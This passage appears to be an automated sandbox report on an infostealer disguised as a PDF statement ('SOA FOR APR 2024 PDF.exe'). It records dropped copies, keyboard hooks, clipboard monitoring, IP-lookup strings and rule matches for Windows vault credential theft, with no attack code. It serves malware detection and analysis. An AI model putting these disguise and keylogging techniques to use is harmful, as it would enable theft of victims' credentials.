                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3326899826.0000000006497000.00000004.00000020.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3275075106.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.000000000296A000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.0000000002894000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3275604629.0000000000F76000.00000004.00000020.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3275604629.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3326328315.0000000006A5C000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.000000000351E000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3326328315.0000000006AA9000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.0000000003504000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.00000000035C4000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3276901832.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3278778403.0000000001713000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3283970574.0000000003244000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3322622943.00000000066A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: eeBIYZL.exe, 0000000E.00000002.3275604629.0000000000FB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c6
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3326899826.0000000006497000.00000004.00000020.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3275075106.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.000000000296A000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.0000000002894000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3275604629.0000000000F76000.00000004.00000020.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3275604629.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3326328315.0000000006A5C000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.000000000351E000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3326328315.0000000006AA9000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.0000000003504000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.00000000035C4000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3276901832.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3278778403.0000000001713000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3283970574.0000000003244000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3322622943.00000000066A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: SOA FOR APR 2024 PDF.exe, 00000000.00000002.2071533656.00000000048BB000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3273741870.0000000000435000.00000040.00000400.00020000.00000000.sdmp, eeBIYZL.exe, 0000000A.00000002.2132450490.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000000F.00000002.2229738944.0000000004BEC000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000015.00000002.2316615219.00000000045FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: SOA FOR APR 2024 PDF.exe, 00000000.00000002.2071533656.00000000048BB000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3273741870.0000000000435000.00000040.00000400.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.0000000002811000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000A.00000002.2132450490.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000000F.00000002.2229738944.0000000004BEC000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.000000000348C000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000015.00000002.2316615219.00000000045FC000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3283970574.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.0000000002811000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.000000000348C000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3283970574.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.0000000002811000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.000000000348C000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3283970574.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49721 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49723 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.raw.unpack, 8WWn.cs.Net Code: UOFvW
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48f62c8.7.raw.unpack, 8WWn.cs.Net Code: UOFvW
                    Installs a global keyboard hook
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\eeBIYZL.exe
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48f62c8.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.2.BjTxJte.exe.4bec170.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.2.BjTxJte.exe.4c27190.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 21.2.BjTxJte.exe.45fc310.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.eeBIYZL.exe.3fe9420.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 21.2.BjTxJte.exe.4637330.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.eeBIYZL.exe.3fae400.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.2.BjTxJte.exe.4bec170.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.2.BjTxJte.exe.4c27190.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48f62c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.eeBIYZL.exe.3fe9420.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 21.2.BjTxJte.exe.4637330.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.eeBIYZL.exe.3fae400.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 21.2.BjTxJte.exe.45fc310.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 0_2_00E1E3B40_2_00E1E3B4
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 0_2_04F40FD40_2_04F40FD4
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 0_2_04F424DA0_2_04F424DA
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 0_2_04F405180_2_04F40518
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 0_2_04F405080_2_04F40508
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 0_2_070C75380_2_070C7538
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 0_2_070C08B00_2_070C08B0
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 0_2_070CC5B80_2_070CC5B8
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 0_2_070CA4E80_2_070CA4E8
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 0_2_070C21170_2_070C2117
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 0_2_070C21410_2_070C2141
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 0_2_070C21500_2_070C2150
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 0_2_070CC16F0_2_070CC16F
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 0_2_070CC1800_2_070CC180
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 0_2_070CA0B00_2_070CA0B0
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 0_2_070CA9200_2_070CA920
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 0_2_070C38000_2_070C3800
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 0_2_070C38100_2_070C3810
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 0_2_070C089F0_2_070C089F
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 0_2_0D3B1D780_2_0D3B1D78
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_00F041F89_2_00F041F8
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_00F0A9989_2_00F0A998
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_00F04AC89_2_00F04AC8
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_00F0EB189_2_00F0EB18
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_00F0ADF89_2_00F0ADF8
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_00F03EB09_2_00F03EB0
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_00F0CF6F9_2_00F0CF6F
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_066B27509_2_066B2750
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_066B55689_2_066B5568
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_066B7D489_2_066B7D48
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_066BC1389_2_066BC138
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_066BB1F89_2_066BB1F8
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_066B65C89_2_066B65C8
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_066B76689_2_066B7668
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_066BE3609_2_066BE360
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_066B00409_2_066B0040
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_066B5CC09_2_066B5CC0
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_067AEEC09_2_067AEEC0
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_067A1DC89_2_067A1DC8
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_067A1DC59_2_067A1DC5
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 10_2_009FE3B410_2_009FE3B4
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 10_2_0502753810_2_05027538
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 10_2_0502C5B810_2_0502C5B8
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 10_2_0502A4E810_2_0502A4E8
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 10_2_0502211710_2_05022117
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 10_2_0502214110_2_05022141
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 10_2_0502215010_2_05022150
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 10_2_0502C16F10_2_0502C16F
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 10_2_0502C18010_2_0502C180
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 10_2_0502A0B010_2_0502A0B0
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 10_2_0502A92010_2_0502A920
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 10_2_0502380010_2_05023800
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 10_2_0502381010_2_05023810
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 10_2_0502089F10_2_0502089F
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 10_2_050208B010_2_050208B0
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 10_2_087215B010_2_087215B0
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_02C64AC814_2_02C64AC8
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_02C6EB0814_2_02C6EB08
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_02C63EB014_2_02C63EB0
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_02C6ADF814_2_02C6ADF8
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_02C641F814_2_02C641F8
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_06A7275014_2_06A72750
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_06A765C814_2_06A765C8
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_06A7556814_2_06A75568
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_06A77D4814_2_06A77D48
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_06A7B1F814_2_06A7B1F8
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_06A7C13814_2_06A7C138
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_06A7766814_2_06A77668
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_06A75CC014_2_06A75CC0
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_06A7E36014_2_06A7E360
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_06A7004014_2_06A70040
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_06B61DC314_2_06B61DC3
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_06B61DC814_2_06B61DC8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 15_2_0149E3B415_2_0149E3B4
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 15_2_099C08B015_2_099C08B0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 15_2_099C753815_2_099C7538
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 15_2_099CA92015_2_099CA920
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 15_2_099C089F15_2_099C089F
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 15_2_099C381015_2_099C3810
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 15_2_099C380015_2_099C3800
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 15_2_099CC18015_2_099CC180
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 15_2_099C215015_2_099C2150
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 15_2_099C214115_2_099C2141
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 15_2_099CC16F15_2_099CC16F
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 15_2_099CA0B015_2_099CA0B0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 15_2_099CC5B815_2_099CC5B8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 15_2_099CA4E815_2_099CA4E8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 15_2_0D8B183015_2_0D8B1830
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_01E7A54D20_2_01E7A54D
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_01E7E9E820_2_01E7E9E8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_01E74AC820_2_01E74AC8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_01E73EB020_2_01E73EB0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_01E741F820_2_01E741F8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_01E7ACD820_2_01E7ACD8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_06F4343820_2_06F43438
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_06F465D020_2_06F465D0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_06F4557020_2_06F45570
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_06F47D5020_2_06F47D50
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_06F4B1F020_2_06F4B1F0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_06F4C14020_2_06F4C140
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_06F4767020_2_06F47670
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_06F45CB720_2_06F45CB7
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_06F4E36820_2_06F4E368
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_06F4004020_2_06F40040
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_07031DC220_2_07031DC2
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_07031DC820_2_07031DC8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_06F4000720_2_06F40007
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 21_2_00CCE3B421_2_00CCE3B4
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 21_2_04DE0FD421_2_04DE0FD4
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 21_2_04DE24D621_2_04DE24D6
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 21_2_04DE051821_2_04DE0518
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 21_2_04DE050821_2_04DE0508
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 21_2_04DE782821_2_04DE7828
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 21_2_0548753821_2_05487538
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 21_2_0548C5B821_2_0548C5B8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 21_2_0548A4E821_2_0548A4E8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 21_2_0548214121_2_05482141
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 21_2_0548215021_2_05482150
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 21_2_0548C16F21_2_0548C16F
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 21_2_0548C18021_2_0548C180
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 21_2_0548A0B021_2_0548A0B0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 21_2_0548A92021_2_0548A920
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 21_2_0548380021_2_05483800
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 21_2_0548381021_2_05483810
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 21_2_0548089F21_2_0548089F
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 21_2_054808B021_2_054808B0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 21_2_0D1A178021_2_0D1A1780
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 24_2_0153A50024_2_0153A500
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 24_2_0153E9B024_2_0153E9B0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 24_2_01534AC824_2_01534AC8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 24_2_0153ACD824_2_0153ACD8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 24_2_01533EB024_2_01533EB0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 24_2_015341F824_2_015341F8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 24_2_06E7343824_2_06E73438
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 24_2_06E765D024_2_06E765D0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 24_2_06E7557024_2_06E75570
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 24_2_06E77D5024_2_06E77D50
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 24_2_06E7B20024_2_06E7B200
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 24_2_06E7C14024_2_06E7C140
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 24_2_06E7767024_2_06E77670
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 24_2_06E75CC824_2_06E75CC8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 24_2_06E7E36824_2_06E7E368
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 24_2_06E7004024_2_06E70040
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 24_2_06F61DC224_2_06F61DC2
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 24_2_06F61DC824_2_06F61DC8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 24_2_06E7000624_2_06E70006
                    Source: SOA FOR APR 2024 PDF.exeStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
